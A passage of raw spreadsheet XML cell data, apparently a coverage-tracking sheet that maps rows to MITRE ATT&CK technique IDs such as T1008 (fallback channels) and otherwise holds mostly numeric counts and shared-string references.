      <c r="JY5" s="111">
        <v>0</v>
      </c>
      <c r="JZ5" s="111">
        <v>0</v>
      </c>
      <c r="KA5" s="112">
        <v>0</v>
      </c>
      <c r="KB5" s="113">
        <v>0</v>
      </c>
      <c r="KC5" s="114">
        <v>0</v>
      </c>
      <c r="KD5" s="503">
        <v>0</v>
      </c>
      <c r="KE5" s="115">
        <v>0</v>
      </c>
      <c r="KF5" s="115">
        <v>0</v>
      </c>
      <c r="KG5" s="116">
        <v>0</v>
      </c>
      <c r="KH5" s="250">
        <v>0</v>
      </c>
      <c r="KI5" s="251">
        <v>0</v>
      </c>
      <c r="KJ5" s="505">
        <v>0</v>
      </c>
      <c r="KK5" s="252">
        <v>0</v>
      </c>
      <c r="KL5" s="252">
        <v>0</v>
      </c>
      <c r="KM5" s="253">
        <v>0</v>
      </c>
      <c r="KN5" s="101">
        <v>0</v>
      </c>
      <c r="KO5" s="102">
        <v>0</v>
      </c>
      <c r="KP5" s="102">
        <v>0</v>
      </c>
      <c r="KQ5" s="103">
        <v>0</v>
      </c>
      <c r="KR5" s="103">
        <v>0</v>
      </c>
      <c r="KS5" s="104">
        <v>0</v>
      </c>
      <c r="KT5" s="105">
        <v>0</v>
      </c>
      <c r="KU5" s="106">
        <v>0</v>
      </c>
      <c r="KV5" s="497">
        <v>0</v>
      </c>
      <c r="KW5" s="107">
        <v>0</v>
      </c>
      <c r="KX5" s="107">
        <v>0</v>
      </c>
      <c r="KY5" s="108">
        <v>0</v>
      </c>
      <c r="KZ5" s="109">
        <v>0</v>
      </c>
      <c r="LA5" s="110">
        <v>0</v>
      </c>
      <c r="LB5" s="501">
        <v>0</v>
      </c>
      <c r="LC5" s="111">
        <v>0</v>
      </c>
      <c r="LD5" s="111">
        <v>0</v>
      </c>
      <c r="LE5" s="112">
        <v>0</v>
      </c>
      <c r="LF5" s="113">
        <v>0</v>
      </c>
      <c r="LG5" s="114">
        <v>0</v>
      </c>
      <c r="LH5" s="503">
        <v>0</v>
      </c>
      <c r="LI5" s="115">
        <v>0</v>
      </c>
      <c r="LJ5" s="115">
        <v>0</v>
      </c>
      <c r="LK5" s="116">
        <v>0</v>
      </c>
      <c r="LL5" s="117">
        <v>3</v>
      </c>
      <c r="LM5" s="507">
        <v>3</v>
      </c>
      <c r="LN5" s="119">
        <v>0</v>
      </c>
      <c r="LO5" s="119">
        <v>3</v>
      </c>
      <c r="LP5" s="119">
        <v>3</v>
      </c>
      <c r="LQ5" s="119">
        <v>0</v>
      </c>
      <c r="LR5" s="119">
        <v>3</v>
      </c>
      <c r="LS5" s="119">
        <v>3</v>
      </c>
      <c r="LT5" s="382"/>
      <c r="LU5" s="117">
        <v>0</v>
      </c>
      <c r="LV5" s="118">
        <v>0</v>
      </c>
      <c r="LW5" s="507">
        <v>0</v>
      </c>
      <c r="LX5" s="119">
        <v>0</v>
      </c>
      <c r="LY5" s="119">
        <v>0</v>
      </c>
      <c r="LZ5" s="119">
        <v>0</v>
      </c>
      <c r="MA5" s="117">
        <v>0</v>
      </c>
      <c r="MB5" s="118">
        <v>0</v>
      </c>
      <c r="MC5" s="507">
        <v>0</v>
      </c>
      <c r="MD5" s="119">
        <v>0</v>
      </c>
      <c r="ME5" s="119">
        <v>0</v>
      </c>
      <c r="MF5" s="119">
        <v>0</v>
      </c>
      <c r="MG5" s="117">
        <v>0</v>
      </c>
      <c r="MH5" s="118">
        <v>0</v>
      </c>
      <c r="MI5" s="507">
        <v>0</v>
      </c>
      <c r="MJ5" s="119">
        <v>0</v>
      </c>
      <c r="MK5" s="119">
        <v>0</v>
      </c>
      <c r="ML5" s="119">
        <v>0</v>
      </c>
      <c r="MM5" s="117">
        <v>0</v>
      </c>
      <c r="MN5" s="118">
        <v>0</v>
      </c>
      <c r="MO5" s="507">
        <v>0</v>
      </c>
      <c r="MP5" s="119">
        <v>0</v>
      </c>
      <c r="MQ5" s="119">
        <v>0</v>
      </c>
      <c r="MR5" s="119">
        <v>0</v>
      </c>
      <c r="MS5" s="117">
        <v>0</v>
      </c>
      <c r="MT5" s="118">
        <v>0</v>
      </c>
      <c r="MU5" s="507">
        <v>0</v>
      </c>
      <c r="MV5" s="119">
        <v>0</v>
      </c>
      <c r="MW5" s="119">
        <v>0</v>
      </c>
      <c r="MX5" s="119">
        <v>0</v>
      </c>
      <c r="MY5" s="117">
        <v>0</v>
      </c>
      <c r="MZ5" s="118">
        <v>0</v>
      </c>
      <c r="NA5" s="507">
        <v>0</v>
      </c>
      <c r="NB5" s="119">
        <v>0</v>
      </c>
      <c r="NC5" s="119">
        <v>0</v>
      </c>
      <c r="ND5" s="119">
        <v>0</v>
      </c>
      <c r="NE5" s="117">
        <v>0</v>
      </c>
      <c r="NF5" s="118">
        <v>0</v>
      </c>
      <c r="NG5" s="507">
        <v>0</v>
      </c>
      <c r="NH5" s="119">
        <v>0</v>
      </c>
      <c r="NI5" s="119">
        <v>0</v>
      </c>
      <c r="NJ5" s="119">
        <v>0</v>
      </c>
      <c r="NK5" s="117">
        <v>1</v>
      </c>
      <c r="NL5" s="118" t="s">
        <v>4316</v>
      </c>
      <c r="NM5" s="507">
        <v>1</v>
      </c>
      <c r="NN5" s="119" t="s">
        <v>2515</v>
      </c>
      <c r="NO5" s="119">
        <v>1</v>
      </c>
      <c r="NP5" s="119">
        <v>1</v>
      </c>
      <c r="NQ5" s="117">
        <v>0</v>
      </c>
      <c r="NR5" s="118">
        <v>0</v>
      </c>
      <c r="NS5" s="507">
        <v>0</v>
      </c>
      <c r="NT5" s="119">
        <v>0</v>
      </c>
      <c r="NU5" s="119">
        <v>0</v>
      </c>
      <c r="NV5" s="119">
        <v>0</v>
      </c>
      <c r="NW5" s="117">
        <v>2</v>
      </c>
      <c r="NX5" s="118" t="s">
        <v>4317</v>
      </c>
      <c r="NY5" s="507">
        <v>2</v>
      </c>
      <c r="NZ5" s="119" t="s">
        <v>2516</v>
      </c>
      <c r="OA5" s="119">
        <v>2</v>
      </c>
      <c r="OB5" s="119">
        <v>2</v>
      </c>
      <c r="OC5" s="120">
        <v>0</v>
      </c>
      <c r="OD5" s="120">
        <v>0</v>
      </c>
      <c r="OE5" s="120">
        <v>0</v>
      </c>
      <c r="OF5" s="120">
        <v>0</v>
      </c>
      <c r="OG5" s="120">
        <v>0</v>
      </c>
      <c r="OH5" s="120">
        <v>0</v>
      </c>
      <c r="OI5" s="120">
        <v>0</v>
      </c>
      <c r="OJ5" s="120">
        <v>0</v>
      </c>
      <c r="OK5" s="383"/>
      <c r="OL5" s="120">
        <v>0</v>
      </c>
      <c r="OM5" s="120">
        <v>0</v>
      </c>
      <c r="ON5" s="120">
        <v>0</v>
      </c>
      <c r="OO5" s="120"/>
      <c r="OP5" s="120">
        <v>0</v>
      </c>
      <c r="OQ5" s="464">
        <v>0</v>
      </c>
      <c r="OR5" s="120">
        <v>0</v>
      </c>
      <c r="OS5" s="120">
        <v>0</v>
      </c>
      <c r="OT5" s="120">
        <v>0</v>
      </c>
      <c r="OU5" s="120"/>
      <c r="OV5" s="120">
        <v>0</v>
      </c>
      <c r="OW5" s="464">
        <v>0</v>
      </c>
      <c r="OX5" s="120">
        <v>0</v>
      </c>
      <c r="OY5" s="120">
        <v>0</v>
      </c>
      <c r="OZ5" s="120">
        <v>0</v>
      </c>
      <c r="PA5" s="120"/>
      <c r="PB5" s="120">
        <v>0</v>
      </c>
      <c r="PC5" s="464">
        <v>0</v>
      </c>
      <c r="PD5" s="120">
        <v>0</v>
      </c>
      <c r="PE5" s="120">
        <v>0</v>
      </c>
      <c r="PF5" s="120">
        <v>0</v>
      </c>
      <c r="PG5" s="120"/>
      <c r="PH5" s="120">
        <v>0</v>
      </c>
      <c r="PI5" s="464">
        <v>0</v>
      </c>
      <c r="PJ5" s="120">
        <v>0</v>
      </c>
      <c r="PK5" s="120">
        <v>0</v>
      </c>
      <c r="PL5" s="120">
        <v>0</v>
      </c>
      <c r="PM5" s="120"/>
      <c r="PN5" s="120">
        <v>0</v>
      </c>
      <c r="PO5" s="464">
        <v>0</v>
      </c>
      <c r="PP5" s="120">
        <v>0</v>
      </c>
      <c r="PQ5" s="120">
        <v>0</v>
      </c>
      <c r="PR5" s="120">
        <v>0</v>
      </c>
      <c r="PS5" s="120"/>
      <c r="PT5" s="120">
        <v>0</v>
      </c>
      <c r="PU5" s="464">
        <v>0</v>
      </c>
      <c r="PV5" s="120">
        <v>0</v>
      </c>
      <c r="PW5" s="120">
        <v>0</v>
      </c>
      <c r="PX5" s="120">
        <v>0</v>
      </c>
      <c r="PY5" s="120"/>
      <c r="PZ5" s="120">
        <v>0</v>
      </c>
      <c r="QA5" s="464">
        <v>0</v>
      </c>
      <c r="QB5" s="120">
        <v>0</v>
      </c>
      <c r="QC5" s="120">
        <v>0</v>
      </c>
      <c r="QD5" s="120">
        <v>0</v>
      </c>
      <c r="QE5" s="120"/>
      <c r="QF5" s="120">
        <v>0</v>
      </c>
      <c r="QG5" s="464">
        <v>0</v>
      </c>
      <c r="QH5" s="120">
        <v>0</v>
      </c>
      <c r="QI5" s="120">
        <v>0</v>
      </c>
      <c r="QJ5" s="120">
        <v>0</v>
      </c>
      <c r="QK5" s="120"/>
      <c r="QL5" s="120">
        <v>0</v>
      </c>
      <c r="QM5" s="464">
        <v>0</v>
      </c>
      <c r="QN5" s="120">
        <v>0</v>
      </c>
      <c r="QO5" s="120">
        <v>0</v>
      </c>
      <c r="QP5" s="120">
        <v>0</v>
      </c>
      <c r="QQ5" s="120"/>
      <c r="QR5" s="120">
        <v>0</v>
      </c>
      <c r="QS5" s="464">
        <v>0</v>
      </c>
      <c r="QT5" s="184"/>
      <c r="QU5" s="184"/>
      <c r="QV5" s="184"/>
      <c r="QW5" s="184"/>
      <c r="QX5" s="184"/>
      <c r="QY5" s="184"/>
      <c r="QZ5" s="184"/>
      <c r="RA5" s="184"/>
      <c r="RB5" s="184"/>
      <c r="RC5" s="184"/>
      <c r="RD5" s="184"/>
      <c r="RE5" s="184"/>
      <c r="RF5" s="184"/>
      <c r="RG5" s="184"/>
      <c r="RH5" s="184"/>
      <c r="RI5" s="184"/>
      <c r="RJ5" s="184"/>
      <c r="RK5" s="184"/>
      <c r="RL5" s="184"/>
      <c r="RM5" s="184"/>
      <c r="RN5" s="184"/>
      <c r="RO5" s="184"/>
      <c r="RP5" s="184"/>
      <c r="RQ5" s="184"/>
      <c r="RR5" s="184"/>
      <c r="RS5" s="184"/>
      <c r="RT5" s="184"/>
      <c r="RU5" s="184"/>
      <c r="RV5" s="184"/>
      <c r="RW5" s="184"/>
      <c r="RX5" s="184"/>
      <c r="RY5" s="184"/>
      <c r="RZ5" s="184"/>
      <c r="SA5" s="184"/>
      <c r="SB5" s="184"/>
      <c r="SC5" s="184"/>
      <c r="SD5" s="184"/>
      <c r="SE5" s="184"/>
      <c r="SF5" s="184"/>
      <c r="SG5" s="184"/>
      <c r="SH5" s="184"/>
      <c r="SI5" s="184"/>
      <c r="SJ5" s="184"/>
      <c r="SK5" s="184"/>
      <c r="SL5" s="184"/>
      <c r="SM5" s="184"/>
      <c r="SN5" s="184"/>
      <c r="SO5" s="184"/>
      <c r="SP5" s="184"/>
      <c r="SQ5" s="184"/>
      <c r="SR5" s="184"/>
      <c r="SS5" s="184"/>
      <c r="ST5" s="184"/>
      <c r="SU5" s="184"/>
      <c r="SV5" s="184"/>
      <c r="SW5" s="184"/>
      <c r="SX5" s="184"/>
      <c r="SY5" s="184"/>
      <c r="SZ5" s="184"/>
      <c r="TA5" s="184"/>
      <c r="TB5" s="184"/>
      <c r="TC5" s="184"/>
      <c r="TD5" s="184"/>
      <c r="TE5" s="184"/>
      <c r="TF5" s="184"/>
      <c r="TG5" s="184"/>
      <c r="TH5" s="184"/>
      <c r="TI5" s="184"/>
      <c r="TJ5" s="184"/>
      <c r="TK5" s="184"/>
      <c r="TL5" s="184"/>
      <c r="TM5" s="184"/>
      <c r="TN5" s="184"/>
      <c r="TO5" s="184"/>
      <c r="TP5" s="184"/>
      <c r="TQ5" s="184"/>
      <c r="TR5" s="184"/>
      <c r="TS5" s="184"/>
      <c r="TT5" s="184"/>
      <c r="TU5" s="184"/>
      <c r="TV5" s="184"/>
      <c r="TW5" s="184"/>
      <c r="TX5" s="184"/>
      <c r="TY5" s="184"/>
      <c r="TZ5" s="184"/>
      <c r="UA5" s="184"/>
      <c r="UB5" s="184"/>
      <c r="UC5" s="184"/>
      <c r="UD5" s="184"/>
      <c r="UE5" s="184"/>
      <c r="UF5" s="184"/>
      <c r="UG5" s="184"/>
      <c r="UH5" s="184"/>
      <c r="UI5" s="184"/>
      <c r="UJ5" s="184"/>
      <c r="UK5" s="184"/>
      <c r="UL5" s="184"/>
      <c r="UM5" s="184"/>
      <c r="UN5" s="184"/>
      <c r="UO5" s="184"/>
      <c r="UP5" s="184"/>
      <c r="UQ5" s="184"/>
      <c r="UR5" s="184"/>
      <c r="US5" s="184"/>
      <c r="UT5" s="184"/>
      <c r="UU5" s="184"/>
      <c r="UV5" s="184"/>
      <c r="UW5" s="184"/>
      <c r="UX5" s="184"/>
      <c r="UY5" s="184"/>
      <c r="UZ5" s="184"/>
      <c r="VA5" s="184"/>
      <c r="VB5" s="184"/>
      <c r="VC5" s="184"/>
      <c r="VD5" s="184"/>
      <c r="VE5" s="184"/>
      <c r="VF5" s="184"/>
      <c r="VG5" s="184"/>
      <c r="VH5" s="184"/>
      <c r="VI5" s="184"/>
      <c r="VJ5" s="184"/>
      <c r="VK5" s="184"/>
      <c r="VL5" s="184"/>
      <c r="VM5" s="184"/>
      <c r="VN5" s="184"/>
      <c r="VO5" s="184"/>
      <c r="VP5" s="184"/>
      <c r="VQ5" s="184"/>
      <c r="VR5" s="184"/>
      <c r="VS5" s="184"/>
      <c r="VT5" s="184"/>
      <c r="VU5" s="184"/>
      <c r="VV5" s="184"/>
      <c r="VW5" s="184"/>
      <c r="VX5" s="184"/>
      <c r="VY5" s="184"/>
    </row>
    <row r="6" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A6" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B6" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C6" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D6" s="83" t="s">
        <v>12</v>
      </c>
      <c r="E6" s="83">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F6" s="83" t="s">
        <v>13</v>
      </c>
      <c r="G6" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H6" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I6" s="81" t="s">
        <v>781</v>
      </c>
      <c r="J6" s="85" t="s">
        <v>782</v>
      </c>
      <c r="K6" s="81" t="s">
        <v>783</v>
      </c>
      <c r="L6" s="81" t="s">
        <v>784</v>
      </c>
      <c r="M6" s="378" t="s">
        <v>182</v>
      </c>
      <c r="N6" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O6" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P6" s="91"/>
      <c r="Q6" s="379" t="s">
        <v>785</v>
      </c>
      <c r="R6" s="92" t="s">
        <v>786</v>
      </c>
      <c r="S6" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T6" s="92" t="s">
        <v>788</v>
      </c>
      <c r="U6" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V6" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W6" s="96" t="s">
        <v>789</v>
      </c>
      <c r="X6" s="97" t="s">
        <v>790</v>
      </c>
      <c r="Y6" s="83" t="s">
        <v>791</v>
      </c>
      <c r="Z6" s="98" t="s">
        <v>792</v>
      </c>
      <c r="AA6" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB6" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC6" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD6" s="83"/>
      <c r="AE6" s="83"/>
      <c r="AF6" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG6" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH6" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI6" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ6" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK6" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL6" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM6" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN6" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO6" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP6" s="385" t="str">
        <f>M6&amp;"-frag"</f>
        <v>T1008-Fallback_channels-frag</v>
      </c>
      <c r="AQ6" s="358">
        <v>6</v>
      </c>
      <c r="AR6" s="100"/>
      <c r="AS6" s="100">
        <v>2</v>
      </c>
      <c r="AT6" s="100">
        <v>1</v>
      </c>
      <c r="AU6" s="100">
        <v>3</v>
      </c>
      <c r="AV6" s="92" t="s">
        <v>793</v>
      </c>
      <c r="AW6" s="100">
        <v>2</v>
      </c>
      <c r="AX6" s="100">
        <v>2</v>
      </c>
      <c r="AY6" s="100">
        <v>1</v>
      </c>
      <c r="AZ6" s="100">
        <v>3</v>
      </c>
      <c r="BA6" s="381" t="s">
        <v>4868</v>
      </c>
      <c r="BB6" s="101">
        <v>15</v>
      </c>
      <c r="BC6" s="102" t="s">
        <v>1789</v>
      </c>
      <c r="BD6" s="102">
        <v>1</v>
      </c>
      <c r="BE6" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF6" s="103">
        <v>1</v>
      </c>
      <c r="BG6" s="104">
        <v>1</v>
      </c>
      <c r="BH6" s="105">
        <v>17</v>
      </c>
      <c r="BI6" s="106" t="s">
        <v>2518</v>
      </c>
      <c r="BJ6" s="497">
        <v>7</v>
      </c>
      <c r="BK6" s="107" t="s">
        <v>2519</v>
      </c>
      <c r="BL6" s="107">
        <v>4</v>
      </c>
      <c r="BM6" s="108">
        <v>3</v>
      </c>
      <c r="BN6" s="109">
        <v>32</v>
      </c>
      <c r="BO6" s="110" t="s">
        <v>1976</v>
      </c>
      <c r="BP6" s="501">
        <v>8</v>
      </c>
      <c r="BQ6" s="111" t="s">
        <v>1977</v>
      </c>
      <c r="BR6" s="111">
        <v>5</v>
      </c>
      <c r="BS6" s="112">
        <v>3</v>
      </c>
      <c r="BT6" s="113">
        <v>99</v>
      </c>
      <c r="BU6" s="114" t="s">
        <v>2520</v>
      </c>
      <c r="BV6" s="503">
        <v>4</v>
      </c>
      <c r="BW6" s="115" t="s">
        <v>2521</v>
      </c>
      <c r="BX6" s="115">
        <v>3</v>
      </c>
      <c r="BY6" s="116">
        <v>3</v>
      </c>
      <c r="BZ6" s="250">
        <v>57</v>
      </c>
      <c r="CA6" s="251" t="s">
        <v>2522</v>
      </c>
      <c r="CB6" s="505">
        <v>28</v>
      </c>
      <c r="CC6" s="252" t="s">
        <v>2523</v>
      </c>
      <c r="CD6" s="252">
        <v>22</v>
      </c>
      <c r="CE6" s="253">
        <v>5</v>
      </c>
      <c r="CF6" s="101">
        <v>156</v>
      </c>
      <c r="CG6" s="102" t="s">
        <v>2524</v>
      </c>
      <c r="CH6" s="102">
        <v>32</v>
      </c>
      <c r="CI6" s="103" t="s">
        <v>2525</v>
      </c>
      <c r="CJ6" s="103">
        <v>25</v>
      </c>
      <c r="CK6" s="104">
        <v>5</v>
      </c>
      <c r="CL6" s="105">
        <v>0</v>
      </c>
      <c r="CM6" s="106">
        <v>0</v>
      </c>
      <c r="CN6" s="497">
        <v>0</v>
      </c>
      <c r="CO6" s="107">
        <v>0</v>
      </c>
      <c r="CP6" s="107">
        <v>0</v>
      </c>
      <c r="CQ6" s="108">
        <v>0</v>
      </c>
      <c r="CR6" s="109">
        <v>0</v>
      </c>
      <c r="CS6" s="110">
        <v>0</v>
      </c>
      <c r="CT6" s="501">
        <v>0</v>
      </c>
      <c r="CU6" s="111">
        <v>0</v>
      </c>
      <c r="CV6" s="111">
        <v>0</v>
      </c>
      <c r="CW6" s="112">
        <v>0</v>
      </c>
      <c r="CX6" s="113">
        <v>32</v>
      </c>
      <c r="CY6" s="114" t="s">
        <v>1976</v>
      </c>
      <c r="CZ6" s="503">
        <v>8</v>
      </c>
      <c r="DA6" s="115" t="s">
        <v>1977</v>
      </c>
      <c r="DB6" s="115">
        <v>5</v>
      </c>
      <c r="DC6" s="116">
        <v>3</v>
      </c>
      <c r="DD6" s="101">
        <v>0</v>
      </c>
      <c r="DE6" s="102">
        <v>0</v>
      </c>
      <c r="DF6" s="102">
        <v>0</v>
      </c>
      <c r="DG6" s="103">
        <v>0</v>
      </c>
      <c r="DH6" s="103">
        <v>0</v>
      </c>
      <c r="DI6" s="104">
        <v>0</v>
      </c>
      <c r="DJ6" s="105">
        <v>17</v>
      </c>
      <c r="DK6" s="106" t="s">
        <v>2518</v>
      </c>
      <c r="DL6" s="497">
        <v>7</v>
      </c>
      <c r="DM6" s="107" t="s">
        <v>2519</v>
      </c>
      <c r="DN6" s="107">
        <v>4</v>
      </c>
      <c r="DO6" s="108">
        <v>3</v>
      </c>
      <c r="DP6" s="109">
        <v>17</v>
      </c>
      <c r="DQ6" s="110" t="s">
        <v>2518</v>
      </c>
      <c r="DR6" s="501">
        <v>7</v>
      </c>
      <c r="DS6" s="111" t="s">
        <v>2519</v>
      </c>
      <c r="DT6" s="111">
        <v>4</v>
      </c>
      <c r="DU6" s="112">
        <v>3</v>
      </c>
      <c r="DV6" s="113">
        <v>84</v>
      </c>
      <c r="DW6" s="114" t="s">
        <v>2526</v>
      </c>
      <c r="DX6" s="503">
        <v>3</v>
      </c>
      <c r="DY6" s="115" t="s">
        <v>2527</v>
      </c>
      <c r="DZ6" s="115">
        <v>2</v>
      </c>
      <c r="EA6" s="116">
        <v>3</v>
      </c>
      <c r="EB6" s="250">
        <v>17</v>
      </c>
      <c r="EC6" s="251" t="s">
        <v>2518</v>
      </c>
      <c r="ED6" s="505">
        <v>7</v>
      </c>
      <c r="EE6" s="252" t="s">
        <v>2519</v>
      </c>
      <c r="EF6" s="252">
        <v>4</v>
      </c>
      <c r="EG6" s="253">
        <v>3</v>
      </c>
      <c r="EH6" s="101">
        <v>101</v>
      </c>
      <c r="EI6" s="102" t="s">
        <v>2528</v>
      </c>
      <c r="EJ6" s="102">
        <v>10</v>
      </c>
      <c r="EK6" s="103" t="s">
        <v>2529</v>
      </c>
      <c r="EL6" s="103">
        <v>6</v>
      </c>
      <c r="EM6" s="104">
        <v>3</v>
      </c>
      <c r="EN6" s="105">
        <v>0</v>
      </c>
      <c r="EO6" s="106">
        <v>0</v>
      </c>
      <c r="EP6" s="497">
        <v>0</v>
      </c>
      <c r="EQ6" s="107">
        <v>0</v>
      </c>
      <c r="ER6" s="107">
        <v>0</v>
      </c>
      <c r="ES6" s="108">
        <v>0</v>
      </c>
      <c r="ET6" s="109">
        <v>0</v>
      </c>
      <c r="EU6" s="110">
        <v>0</v>
      </c>
      <c r="EV6" s="501">
        <v>0</v>
      </c>
      <c r="EW6" s="111">
        <v>0</v>
      </c>
      <c r="EX6" s="111">
        <v>0</v>
      </c>
      <c r="EY6" s="112">
        <v>0</v>
      </c>
      <c r="EZ6" s="113">
        <v>17</v>
      </c>
      <c r="FA6" s="114" t="s">
        <v>2518</v>
      </c>
      <c r="FB6" s="503">
        <v>7</v>
      </c>
      <c r="FC6" s="115" t="s">
        <v>2519</v>
      </c>
      <c r="FD6" s="115">
        <v>4</v>
      </c>
      <c r="FE6" s="116">
        <v>3</v>
      </c>
      <c r="FF6" s="101">
        <v>15</v>
      </c>
      <c r="FG6" s="102" t="s">
        <v>1789</v>
      </c>
      <c r="FH6" s="102">
        <v>1</v>
      </c>
      <c r="FI6" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ6" s="103">
        <v>1</v>
      </c>
      <c r="FK6" s="104">
        <v>1</v>
      </c>
      <c r="FL6" s="105">
        <v>0</v>
      </c>
      <c r="FM6" s="106">
        <v>0</v>
      </c>
      <c r="FN6" s="497">
        <v>0</v>
      </c>
      <c r="FO6" s="107">
        <v>0</v>
      </c>
      <c r="FP6" s="107">
        <v>0</v>
      </c>
      <c r="FQ6" s="108">
        <v>0</v>
      </c>
      <c r="FR6" s="109">
        <v>15</v>
      </c>
      <c r="FS6" s="110" t="s">
        <v>1789</v>
      </c>
      <c r="FT6" s="501">
        <v>1</v>
      </c>
      <c r="FU6" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV6" s="111">
        <v>1</v>
      </c>
      <c r="FW6" s="112">
        <v>1</v>
      </c>
      <c r="FX6" s="113">
        <v>15</v>
      </c>
      <c r="FY6" s="114" t="s">
        <v>1789</v>
      </c>
      <c r="FZ6" s="503">
        <v>1</v>
      </c>
      <c r="GA6" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB6" s="115">
        <v>1</v>
      </c>
      <c r="GC6" s="116">
        <v>1</v>
      </c>
      <c r="GD6" s="250">
        <v>25</v>
      </c>
      <c r="GE6" s="251" t="s">
        <v>2530</v>
      </c>
      <c r="GF6" s="505">
        <v>6</v>
      </c>
      <c r="GG6" s="252" t="s">
        <v>2531</v>
      </c>
      <c r="GH6" s="252">
        <v>3</v>
      </c>
      <c r="GI6" s="253">
        <v>4</v>
      </c>
      <c r="GJ6" s="101">
        <v>40</v>
      </c>
      <c r="GK6" s="102" t="s">
        <v>2532</v>
      </c>
      <c r="GL6" s="102">
        <v>7</v>
      </c>
      <c r="GM6" s="103" t="s">
        <v>2533</v>
      </c>
      <c r="GN6" s="103">
        <v>4</v>
      </c>
      <c r="GO6" s="104">
        <v>5</v>
      </c>
      <c r="GP6" s="105">
        <v>0</v>
      </c>
      <c r="GQ6" s="106">
        <v>0</v>
      </c>
      <c r="GR6" s="497">
        <v>0</v>
      </c>
      <c r="GS6" s="107">
        <v>0</v>
      </c>
      <c r="GT6" s="107">
        <v>0</v>
      </c>
      <c r="GU6" s="108">
        <v>0</v>
      </c>
      <c r="GV6" s="109">
        <v>0</v>
      </c>
      <c r="GW6" s="110">
        <v>0</v>
      </c>
      <c r="GX6" s="501">
        <v>0</v>
      </c>
      <c r="GY6" s="111">
        <v>0</v>
      </c>
      <c r="GZ6" s="111">
        <v>0</v>
      </c>
      <c r="HA6" s="112">
        <v>0</v>
      </c>
      <c r="HB6" s="113">
        <v>15</v>
      </c>
      <c r="HC6" s="114" t="s">
        <v>1789</v>
      </c>
      <c r="HD6" s="503">
        <v>1</v>
      </c>
      <c r="HE6" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF6" s="115">
        <v>1</v>
      </c>
      <c r="HG6" s="116">
        <v>1</v>
      </c>
      <c r="HH6" s="101">
        <v>0</v>
      </c>
      <c r="HI6" s="102">
        <v>0</v>
      </c>
      <c r="HJ6" s="102">
        <v>0</v>
      </c>
      <c r="HK6" s="103">
        <v>0</v>
      </c>
      <c r="HL6" s="103">
        <v>0</v>
      </c>
      <c r="HM6" s="104">
        <v>0</v>
      </c>
      <c r="HN6" s="105">
        <v>0</v>
      </c>
      <c r="HO6" s="106">
        <v>0</v>
      </c>
      <c r="HP6" s="497">
        <v>0</v>
      </c>
      <c r="HQ6" s="107">
        <v>0</v>
      </c>
      <c r="HR6" s="107">
        <v>0</v>
      </c>
      <c r="HS6" s="108">
        <v>0</v>
      </c>
      <c r="HT6" s="109">
        <v>0</v>
      </c>
      <c r="HU6" s="110">
        <v>0</v>
      </c>
      <c r="HV6" s="501">
        <v>0</v>
      </c>
      <c r="HW6" s="111">
        <v>0</v>
      </c>
      <c r="HX6" s="111">
        <v>0</v>
      </c>
      <c r="HY6" s="112">
        <v>0</v>
      </c>
      <c r="HZ6" s="113">
        <v>0</v>
      </c>
      <c r="IA6" s="114">
        <v>0</v>
      </c>
      <c r="IB6" s="503">
        <v>0</v>
      </c>
      <c r="IC6" s="115">
        <v>0</v>
      </c>
      <c r="ID6" s="115">
        <v>0</v>
      </c>
      <c r="IE6" s="116">
        <v>0</v>
      </c>
      <c r="IF6" s="250">
        <v>15</v>
      </c>
      <c r="IG6" s="251" t="s">
        <v>2534</v>
      </c>
      <c r="IH6" s="505">
        <v>15</v>
      </c>
      <c r="II6" s="252" t="s">
        <v>2535</v>
      </c>
      <c r="IJ6" s="252">
        <v>15</v>
      </c>
      <c r="IK6" s="253">
        <v>1</v>
      </c>
      <c r="IL6" s="101">
        <v>15</v>
      </c>
      <c r="IM6" s="102" t="s">
        <v>2534</v>
      </c>
      <c r="IN6" s="102">
        <v>15</v>
      </c>
      <c r="IO6" s="103" t="s">
        <v>2535</v>
      </c>
      <c r="IP6" s="103">
        <v>15</v>
      </c>
      <c r="IQ6" s="104">
        <v>1</v>
      </c>
      <c r="IR6" s="105">
        <v>0</v>
      </c>
      <c r="IS6" s="106">
        <v>0</v>
      </c>
      <c r="IT6" s="497">
        <v>0</v>
      </c>
      <c r="IU6" s="107">
        <v>0</v>
      </c>
      <c r="IV6" s="107">
        <v>0</v>
      </c>
      <c r="IW6" s="108">
        <v>0</v>
      </c>
      <c r="IX6" s="109">
        <v>0</v>
      </c>
      <c r="IY6" s="110">
        <v>0</v>
      </c>
      <c r="IZ6" s="501">
        <v>0</v>
      </c>
      <c r="JA6" s="111">
        <v>0</v>
      </c>
      <c r="JB6" s="111">
        <v>0</v>
      </c>
      <c r="JC6" s="112">
        <v>0</v>
      </c>
      <c r="JD6" s="113">
        <v>0</v>
      </c>
      <c r="JE6" s="114">
        <v>0</v>
      </c>
      <c r="JF6" s="503">
        <v>0</v>
      </c>
      <c r="JG6" s="115">
        <v>0</v>
      </c>
      <c r="JH6" s="115">
        <v>0</v>
      </c>
      <c r="JI6" s="116">
